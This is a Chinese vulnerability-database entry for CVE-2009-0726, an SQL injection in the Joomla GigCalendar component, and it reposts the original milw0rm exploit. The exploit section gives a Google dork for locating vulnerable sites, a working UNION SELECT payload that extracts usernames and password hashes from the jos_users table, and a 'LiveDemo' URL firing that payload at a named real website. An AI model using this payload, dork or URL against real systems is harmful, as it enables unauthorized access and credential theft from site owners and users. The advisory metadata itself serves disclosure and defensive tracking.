Gigcalendar com_gigcal 'index.php' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117228 漏洞类型 SQL注入
发布时间 2009-01-13 更新时间 2009-02-25
CVE编号 CVE-2009-0726 CNNVD-ID CNNVD-200902-683
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7746
https://cxsecurity.com/issue/WLB-2009020267
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-683
|漏洞详情
gigCalendar是一个免费的为维护网站旅游日志的Joomla!andMambo组件。Mambo和Joomla!GigCalendar(com_gigcal)组件中存在SQL注入漏洞。远程攻击者可以借助对index.php的一个细节操作中的gigcal_gigs_id参数,执行任意SQL指令。
|漏洞EXP
#############################################################
Joomla Component com_gigcal(gigcal_gigs_id) SQL-injection
#############################################################


###################################################
#[~] Author        :  boom3rang 
#[~] Greetz        :  H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
#[~] Vulnerability :  SQL injection 
#[~] Google Dork   :  inurl:com_gigcal
--------------------------------------------------
#[!] Name          :  GigCalendar
#[!] creationDate  :  Dec 2005 
#[!] Created by    :  Graham Spice, David Richards 
#[!] AuthorEmail   :  capt@gigcalendar.net 
#[!] Site          :  www.gigcalendar.net
#[!] Version       :  1.0
#[!] Download      :  http://joomlacode.org/gf/project/gigcalendar/frs/?action=FrsReleaseBrowse&frs_package_id=214
###################################################


[-] Example:
http://localhost/Path/index.php?option=com_gigcal&task=details&gigcal_gigs_id=[Exploit]


[-] Exploit:
'+and+1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,concat(username,char(58),password),0,11,12+from+jos_users/*


[-] LiveDemo: 
http://dromnyc.com/home/index.php?option=com_gigcal&task=details&gigcal_gigs_id=402'+and+1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,concat(username,char(58),password),0,11,12+from+jos_users/*&Itemid=37


##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
#[!] Free Palestine
##############################

# milw0rm.com [2009-01-13]
|参考资料

来源:XF
名称:gigcalendar-index-sql-injection(47919)
链接:http://xforce.iss.net/xforce/xfdb/47919
来源:BID
名称:33241
链接:http://www.securityfocus.com/bid/33241
来源:MILW0RM
名称:7746
链接:http://www.milw0rm.com/exploits/7746